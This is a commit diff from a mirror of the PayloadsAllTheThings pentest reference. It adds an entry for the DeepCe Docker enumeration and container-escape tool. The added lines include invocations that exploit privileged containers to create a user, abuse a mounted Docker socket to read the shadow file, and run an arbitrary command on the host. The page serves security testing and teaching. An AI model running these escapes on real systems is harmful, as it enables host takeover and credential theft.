mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-22 06:33:45 +00:00
Deepce - Docker Enumeration, Escalation of Privileges and Container Escapes
This commit is contained in:
parent
27050f6dd8
commit
f48ee0bca5
@ -15,11 +15,18 @@
|
|||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
* Dockscan : https://github.com/kost/dockscan
|
* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations
|
||||||
```powershell
|
```powershell
|
||||||
dockscan unix:///var/run/docker.sock
|
dockscan unix:///var/run/docker.sock
|
||||||
dockscan -r html -o myreport -v tcp://example.com:5422
|
dockscan -r html -o myreport -v tcp://example.com:5422
|
||||||
```
|
```
|
||||||
|
* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
|
||||||
|
```powershell
|
||||||
|
./deepce.sh
|
||||||
|
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
|
||||||
|
./deepce.sh --no-enumeration --exploit SOCK --shadow
|
||||||
|
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"
|
||||||
|
```
|
||||||
|
|
||||||
## Mounted Docker Socket
|
## Mounted Docker Socket
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user